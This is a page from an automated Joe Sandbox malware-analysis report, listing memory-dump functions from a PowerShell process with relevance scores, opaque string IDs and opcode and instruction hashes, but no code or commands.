                                                                • Opcode Fuzzy Hash: 3f62ad29b540aa4f9634421cb1bd576aca8a33e9ee28b39a6fffbf2b28cd70fe
                                                                • Instruction Fuzzy Hash: A6418DF6B002169BDB64BB69884076EFBE5EFC4654F2484BAD805EB344DB31D908C7E0
                                                                Function 07B80F48 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $_q$$_q$$_q
                                                                • API String ID: 0-2441406858
                                                                • Opcode ID: b93f5020812fb9367f2c88caaaede7dbbcdaef0cba34fb790255b0f4a028973f
                                                                • Instruction ID: fb5fdbe36a3ffcb6fcbee278ffd0cc426ab43a6729c344957c2badc9e42824f6
                                                                • Opcode Fuzzy Hash: b93f5020812fb9367f2c88caaaede7dbbcdaef0cba34fb790255b0f4a028973f
                                                                • Instruction Fuzzy Hash: A42147F131030A6BFB68366E8C40B27BA9ADBC0755F34C4BEA519DB285DE75C846C361
                                                                Function 07B853B8 Relevance: 3.5, Strings: 2, Instructions: 971COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q
                                                                • API String ID: 0-531570531
                                                                • Opcode ID: 62aaf89b493b7cdf89de1afac2a7385dd386e26e4c2637e275469a7743b2758f
                                                                • Instruction ID: b0df9b49f0ee18590b7b81fdc744239c8cd3e25c96a5cda94d7627f025aac3cb
                                                                • Opcode Fuzzy Hash: 62aaf89b493b7cdf89de1afac2a7385dd386e26e4c2637e275469a7743b2758f
                                                                • Instruction Fuzzy Hash: 959269B4A00214DFE764DB18C944B5ABBB2EF85308F24C0E9D909AB356DB71DD86CF91
                                                                Function 07B87803 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q
                                                                • API String ID: 0-531570531
                                                                • Opcode ID: ed9e20e323438f4de82cec82d0661d6b513c8661f56bef16163ad7f17a0bcd97
                                                                • Instruction ID: a7ab2019bdd9a58f19e8347c12767bd4f0a096fab6dc0520ab41676a56c09198
                                                                • Opcode Fuzzy Hash: ed9e20e323438f4de82cec82d0661d6b513c8661f56bef16163ad7f17a0bcd97
                                                                • Instruction Fuzzy Hash: 32F1D2B4B012149FE724DB68C954B6E7BB3EB84308F2084E9D509AF795DB31DD81CB91
                                                                Function 07B88613 Relevance: 2.7, Strings: 2, Instructions: 196COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q
                                                                • API String ID: 0-531570531
                                                                • Opcode ID: 8ec6a1f6716d35974ca7a4c5541db96679c72bfd23d7f843f1ce7437b9ae5df5
                                                                • Instruction ID: 4ac58d1f9dbe83ff3d128c9dbf49cb9d032bc2d00795104695c0672ad5b7f702
                                                                • Opcode Fuzzy Hash: 8ec6a1f6716d35974ca7a4c5541db96679c72bfd23d7f843f1ce7437b9ae5df5
                                                                • Instruction Fuzzy Hash: 3351AEF9B20203CFEB54BB39885466A7BE2EFC2314B5484E9E511CF2A6DB30C855C752
                                                                Function 07B80F2C Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $_q$$_q
                                                                • API String ID: 0-458585787
                                                                • Opcode ID: 62a91f538f94a2d352e52d0c443812cfc82fa37426300cea843a61f6f767c9ee
                                                                • Instruction ID: 6044f2bada30722851766e27527155be4fb89ee06224e99cd8e397e753a1664a
                                                                • Opcode Fuzzy Hash: 62a91f538f94a2d352e52d0c443812cfc82fa37426300cea843a61f6f767c9ee
                                                                • Instruction Fuzzy Hash: 7C118CF13043866BFB7426298C407637EA6DF91744F24C4BAA554DB2C5D679C445C361
                                                                Function 07B80A60 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $_q$$_q
                                                                • API String ID: 0-458585787
                                                                • Opcode ID: 31dde5e7a856d546214e5adad2c52fa9e82c1f28851ba22ffd53a92408a94425
                                                                • Instruction ID: 99df5e47d288955aaa0e78564920b37134278765ffa2bdebd08f865473356249
                                                                • Opcode Fuzzy Hash: 31dde5e7a856d546214e5adad2c52fa9e82c1f28851ba22ffd53a92408a94425
                                                                • Instruction Fuzzy Hash: 352137FAA043559FDB64BF6884402A9BBF4FF45250B1980EADC08EB241E2319948C7A1
                                                                Function 07B8539B Relevance: 2.0, Strings: 1, Instructions: 767COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q
                                                                • API String ID: 0-2033115326
                                                                • Opcode ID: b9fa0cbbdedc3d6fddf936a602b46a8c7684fb5714b535f2e59e01f535c20cd5
                                                                • Instruction ID: d6aeccc4e047f6dbc0190f138cf9549252aa5f01a7a4dc2d7847044f37550ec9
                                                                • Opcode Fuzzy Hash: b9fa0cbbdedc3d6fddf936a602b46a8c7684fb5714b535f2e59e01f535c20cd5
                                                                • Instruction Fuzzy Hash: DC7237B4A00214DFE764DB18C944B59BBB2EF85308F64C0E9D909AB352DB72ED85CF91
                                                                Function 07B85FBA Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q
                                                                • API String ID: 0-2033115326
                                                                • Opcode ID: 709d56ace2f22acc90c6f5783e89d7e3ca3c32cd18d05084719c7a594912903a
                                                                • Instruction ID: cb8c1193db36725d752949b7e0959cd4d6cb658e5583e4e88d6d4ec241825e77
                                                                • Opcode Fuzzy Hash: 709d56ace2f22acc90c6f5783e89d7e3ca3c32cd18d05084719c7a594912903a
                                                                • Instruction Fuzzy Hash: DE2258B4A00214DFE764DF18C855B59BBB2EB85308F24C0E9D909AB352DB72ED85CF91
                                                                Function 07B88D8C Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q
                                                                • API String ID: 0-2033115326
                                                                • Opcode ID: 7e542a3addceed3b3c0078a963ad8268190449c4f12c73faed84d785d7fa36fa
                                                                • Instruction ID: 6e6bd3299cad4c1da397e7a9d359fd251cd62dccb2c70423bca7be8c6bb3eb4e
                                                                • Opcode Fuzzy Hash: 7e542a3addceed3b3c0078a963ad8268190449c4f12c73faed84d785d7fa36fa
                                                                • Instruction Fuzzy Hash: D64125F4B24302DFEBA4AF24C540B6A77E3EF90205F9484E6D9049B255D736D981C792
                                                                Function 07B84FB0 Relevance: .3, Instructions: 275COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6ad20d4bf2fafa02a0ebfe21ef148016ba2ad2a60b219eaf21fe75ccfecd321d
                                                                • Instruction ID: 97724f896387ae99cdd4ea5ba1731abf6c0131d39c6f347eef0a65d2c4e52a31
                                                                • Opcode Fuzzy Hash: 6ad20d4bf2fafa02a0ebfe21ef148016ba2ad2a60b219eaf21fe75ccfecd321d
                                                                • Instruction Fuzzy Hash: E6B1AEF4B00205AFE764EB68C545BAEBBA3EF89304F1080A8D415AF795CB76DC51CB91
                                                                Function 07B84F90 Relevance: .2, Instructions: 250COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2d6b5bedd3544a730401f2bea02bde171e448ae3abdafe691f659888659eb911
                                                                • Instruction ID: a4d0a85a362805b56af8ba1952bf4128d0db280bea37b1564709b06ff53ce46d
                                                                • Opcode Fuzzy Hash: 2d6b5bedd3544a730401f2bea02bde171e448ae3abdafe691f659888659eb911
                                                                • Instruction Fuzzy Hash: F3A1AEF4A00201EFE764EF68C545B9ABBB3EF89304F1480A9D405AF791CB75AC91CB91
                                                                Function 07B8A59C Relevance: .1, Instructions: 116COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d27d544f7335753b18bb75748ed18a042255d62cc0c76968cf9c2dda0baba5b9
                                                                • Instruction ID: d93976c5199f4095a94de1d49ab41e7363d078ac404a482df50ca3515e570b2d
                                                                • Opcode Fuzzy Hash: d27d544f7335753b18bb75748ed18a042255d62cc0c76968cf9c2dda0baba5b9
                                                                • Instruction Fuzzy Hash: 6B4139F9A00202DFEB64EF24844176ABBB2EB80304F15C0E7C815EF245D735D891DBA1
                                                                Function 07B86FCE Relevance: .1, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7bfc3cc41c3c87d251530561968fada6cd2779804bb782d0f5b136be16cf6189
                                                                • Instruction ID: b40da1ecfad182f66a01fe6e694346e5323ef74d4e9ae51e3fe131ce40031743
                                                                • Opcode Fuzzy Hash: 7bfc3cc41c3c87d251530561968fada6cd2779804bb782d0f5b136be16cf6189
                                                                • Instruction Fuzzy Hash: 0E31EAB9740214AFE704AB64C915BAF7E63DF84348F20C464E9116F799CF759C828BE1
                                                                Function 07B80E18 Relevance: .1, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 305454665df059930496aee214dffc3d1a570bf85ca12c9a7fbc705b123ffc7d
                                                                • Instruction ID: 6511fc317c323ebd4830c0f998b2ee5e80df27edc3812a6a91a5d07189cda7f3
                                                                • Opcode Fuzzy Hash: 305454665df059930496aee214dffc3d1a570bf85ca12c9a7fbc705b123ffc7d
                                                                • Instruction Fuzzy Hash: 95217CF170031AABE7647A7A884073B7ADAEBC4756F24847BE509DB680DE75C944C360
                                                                Function 07B80DFC Relevance: .1, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f5f9dae796d9f882361a520b11c01543bcb3228ec68a66f1140a1eda81800ed
                                                                • Instruction ID: fd1eb99f2b627f07609cd38f327411de1ca3d9d59e73ad18c39235602d863e67
                                                                • Opcode Fuzzy Hash: 3f5f9dae796d9f882361a520b11c01543bcb3228ec68a66f1140a1eda81800ed
                                                                • Instruction Fuzzy Hash: D621BEF270434ABBF764392988007B77FD6DF85791F2484A7E954DA2C1DA78C988C361
                                                                Function 07B80C08 Relevance: .1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cb8f1ccbbefc8166804c7fade8a318b68ba105fbf46c24ef86be23d88d681a1c
                                                                • Instruction ID: 502ca25b847fc501007b11ded389278b5092769d8c0f82d8b0f68cc865e72320
                                                                • Opcode Fuzzy Hash: cb8f1ccbbefc8166804c7fade8a318b68ba105fbf46c24ef86be23d88d681a1c
                                                                • Instruction Fuzzy Hash: BE0147B630431B9BE7A47DAAD40027AB79ADFC1662F14C47FD549C6610D632C80DCB60
                                                                Function 07B831B4 Relevance: .0, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a568b5d092f00caefcabdfa27bddeb2cb95542c1e3640fe5c93a829fd25f851
                                                                • Instruction ID: 7595f3b1a6cbb7386e92e45b694a1e2b16da5458a533f9cef8d6a1dbcc17d0fa
                                                                • Opcode Fuzzy Hash: 7a568b5d092f00caefcabdfa27bddeb2cb95542c1e3640fe5c93a829fd25f851
                                                                • Instruction Fuzzy Hash: 9DF06DB56042418FE752AB04C854B18BBB2EF82B05F19C0DAD0498F2A3C733DD43CBA1

                                                                Non-executed Functions

                                                                Function 07B824F0 Relevance: 12.8, Strings: 10, Instructions: 306COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$4'_q$4'_q$$_q$$_q$$_q$$_q$$_q$$_q
                                                                • API String ID: 0-2601542563
                                                                • Opcode ID: 5c89c6ccba2b3fd8e19542d43c8578afa545c119fd8de103c911c7d3389dc115
                                                                • Instruction ID: af31d9060bfc586c9fac36b5febd129cde01ec7fe68fd408d70add39ca50e796
                                                                • Opcode Fuzzy Hash: 5c89c6ccba2b3fd8e19542d43c8578afa545c119fd8de103c911c7d3389dc115
                                                                • Instruction Fuzzy Hash: 50A155F9714206DFEB646A2AC8147EABBE5FF81211F1480FAD405CB295DB35CD81C7A2
                                                                Function 07B84290 Relevance: 10.5, Strings: 8, Instructions: 496COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$$_q$$_q$$_q$$_q$$_q$$_q
                                                                • API String ID: 0-4243389563
                                                                • Opcode ID: 80f1b2f57c59a4f5cf932b4b8d0db591d166968e4918a017c806ea253fc33374
                                                                • Instruction ID: f35e89fce5f45b2c41729431c1ccb622c6f7543985eab67cf834e02f089ef8e6
                                                                • Opcode Fuzzy Hash: 80f1b2f57c59a4f5cf932b4b8d0db591d166968e4918a017c806ea253fc33374
                                                                • Instruction Fuzzy Hash: A5F146F5704387DFEB68AF69C84066ABBE6EF81211F1885FAD805CB255DB31C841C7A1
                                                                Function 07B81E60 Relevance: 10.4, Strings: 8, Instructions: 385COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$4'_q$4'_q$t~rq$$_q$$_q$$_q
                                                                • API String ID: 0-1303506249
                                                                • Opcode ID: 810faf6d4675a90f762693ae3f05da868a904f6c4aff28a1d9b8cdb59e1e410c
                                                                • Instruction ID: 6801775b71ea3789c31d11d8c351f37b5a0e4fc88f701c14dd4c0a922ac4b7f8
                                                                • Opcode Fuzzy Hash: 810faf6d4675a90f762693ae3f05da868a904f6c4aff28a1d9b8cdb59e1e410c
                                                                • Instruction Fuzzy Hash: 30C148F1B0120A9FDB64AF69C8406AABBE6FFC5210F2484BED515CB245DB31C906C7A1
                                                                Function 07B88891 Relevance: 10.2, Strings: 8, Instructions: 169COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$tP_q$tP_q$$_q$$_q$$_q$$_q
                                                                • API String ID: 0-574570645
                                                                • Opcode ID: 067750d4ebb52e31b72ebdfc46a0df8115b797fefaaa59089b58862dd7ea23ed
                                                                • Instruction ID: 48b67cdfe70fabb9716128badbf9574e8c296f0a15c09dfa0b650188a26af351
                                                                • Opcode Fuzzy Hash: 067750d4ebb52e31b72ebdfc46a0df8115b797fefaaa59089b58862dd7ea23ed
                                                                • Instruction Fuzzy Hash: A15128F1B60206EFEB68AF64C44476ABBA2FF85310F54C4EAD4158F295CB31D801CB92
                                                                Function 07B89C38 Relevance: 9.2, Strings: 7, Instructions: 478COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$4'_q$tP_q$tP_q$$_q$$_q$$_q
                                                                • API String ID: 0-3731700880
                                                                • Opcode ID: 4856182225f133c950ca140d57dd532364fade82d47091582ebf44fbbe2643d6
                                                                • Instruction ID: 5707b24c54f1ae7116f573218baa336e9f1f99127d436f1c9214be7e46867bd3
                                                                • Opcode Fuzzy Hash: 4856182225f133c950ca140d57dd532364fade82d47091582ebf44fbbe2643d6
                                                                • Instruction Fuzzy Hash: 75F157F17042069FEB64AA69C8003BABBE6EFC5311F14C0BBD459DB254DB32E855CB91
                                                                Function 07B8D758 Relevance: 8.9, Strings: 7, Instructions: 196COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$tP_q$tP_q$$_q$(eq$(eq$(eq
                                                                • API String ID: 0-37460510
                                                                • Opcode ID: 151e6e677e23aca9213136901915250c9404feeaddac5f1e8a3cefbbf306bc05
                                                                • Instruction ID: 47e94af98a6768dbca6a93b063f7eb18662e41eaf4b65598871105d1e33132dd
                                                                • Opcode Fuzzy Hash: 151e6e677e23aca9213136901915250c9404feeaddac5f1e8a3cefbbf306bc05
                                                                • Instruction Fuzzy Hash: B2618EF0B00216DBEBA4AE55C548B6AB7A6EB4C711F6984EBE9046F3D0C731DC41CB91
                                                                Function 07B8D3F4 Relevance: 8.9, Strings: 7, Instructions: 156COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$TQdq$TQdq$tP_q$$_q$$_q$$_q
                                                                • API String ID: 0-2694711154
                                                                • Opcode ID: b32c2bd605cbaf9a5dd9d892ded143e86829f28b41ef52013957ff119dbf93c6
                                                                • Instruction ID: 7755a4bc1182006b8139a67ebe35168d70f80ebdd121845fdefe729a53f01e69
                                                                • Opcode Fuzzy Hash: b32c2bd605cbaf9a5dd9d892ded143e86829f28b41ef52013957ff119dbf93c6
                                                                • Instruction Fuzzy Hash: B951BFF070020ADBEBA8AE04C544BAA77B2FB49315F5885E7E8099B2D1D771DD80CB91
                                                                Function 07B8D408 Relevance: 8.9, Strings: 7, Instructions: 153COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$TQdq$TQdq$tP_q$$_q$$_q$$_q
                                                                • API String ID: 0-2694711154
                                                                • Opcode ID: 292514974b51d8cf8949313ddf01906159aad1c223ec102b10558d320e67ff43
                                                                • Instruction ID: f7fb38bd864ded0c640a9c4a86f1105ef193262d25ae1504ded0d2d551c0bb4e
                                                                • Opcode Fuzzy Hash: 292514974b51d8cf8949313ddf01906159aad1c223ec102b10558d320e67ff43
                                                                • Instruction Fuzzy Hash: 95518FF070060ADBEBA8AE05C544BAA77B2FB49315F5885E7E8099B2D0D771DD80CB91
                                                                Function 07B88B00 Relevance: 7.7, Strings: 6, Instructions: 205COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $_q$$_q$$_q$$_q$$_q$$_q
                                                                • API String ID: 0-155944776
                                                                • Opcode ID: ffd04d11511729a2dbe7d1b42d1d2581d0f211e34c6b47d6c031ba61f9cebeda
                                                                • Instruction ID: 53b4d131a5a16f515b31d2affdccdecca86bbca082b5cda212158a5c7f1334de
                                                                • Opcode Fuzzy Hash: ffd04d11511729a2dbe7d1b42d1d2581d0f211e34c6b47d6c031ba61f9cebeda
                                                                • Instruction Fuzzy Hash: 6C5167F17253068FE7A46A6A880067ABBE6EFC1610B9884FFD405CB345DA36C805C7A1
                                                                Function 07B8CEC0 Relevance: 7.7, Strings: 6, Instructions: 183COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$d%eq$d%eq$d%eq$tP_q$$_q
                                                                • API String ID: 0-3686356251
                                                                • Opcode ID: 14e71625b13065525f5821679f53192bf4db087afbf6e47778d28275d824461f
                                                                • Instruction ID: ef477b58afac9567aee41ca0d6bbe18dc035c7fdb6eb05880dec0b0f8a4bac0c
                                                                • Opcode Fuzzy Hash: 14e71625b13065525f5821679f53192bf4db087afbf6e47778d28275d824461f
                                                                • Instruction Fuzzy Hash: 0E5103F0B14201DFEB64AF24C450AAABBA2EF89715F1884DBD8159F6D1C731DC85CBA1
                                                                Function 07B8DE10 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$tP_q$$_q$$_q$$_q
                                                                • API String ID: 0-3565727911
                                                                • Opcode ID: cf26f4b4cb4e0fb5cd9f0f0a71c2ee32b40090a3bee7f1d3ed54222c17256824
                                                                • Instruction ID: 4510d360a4c7e1b312b32aa599c00d5a57d2549cabfd6f83a6d69c6beca4fb09
                                                                • Opcode Fuzzy Hash: cf26f4b4cb4e0fb5cd9f0f0a71c2ee32b40090a3bee7f1d3ed54222c17256824
                                                                • Instruction Fuzzy Hash: A3619EF0700206DBFFA8AE14C545BAA77B2EB49712F5888E6E8145B2D4C771DC94CBA1
                                                                Function 07B8D006 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'_q$d%eq$d%eq$d%eq$tP_q
                                                                • API String ID: 0-1359258200
                                                                • Opcode ID: 9a2af0a1179f8b5cd540dbcb33b22a0cab5096c007f538321cac3228b0ce21c3
                                                                • Instruction ID: 5ca49c8484472f5deb19758ff9cae3feac11d0e6f752087029615579a5ca9f42
                                                                • Opcode Fuzzy Hash: 9a2af0a1179f8b5cd540dbcb33b22a0cab5096c007f538321cac3228b0ce21c3
                                                                • Instruction Fuzzy Hash: 0531B3F4B00214DFE768EF58C454A5ABBA2EF8C714F248596E815AB390CB32DC42CB91
                                                                Function 07B8C770 Relevance: 5.5, Strings: 4, Instructions: 480COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.1729913313.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7b80000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (o_q$(o_q$(o_q$(o_q
                                                                • API String ID: 0-3600592161
                                                                • Opcode ID: b54005b646c6b40b87e82e058865b546fa9fbfd6e03b775b7e9b0b7e3cb53c17
                                                                • Instruction ID: da30a9bd5f074c2a58bf753d5ef352a36ffd9bc38ffc4f5cccda82272c3fbb05
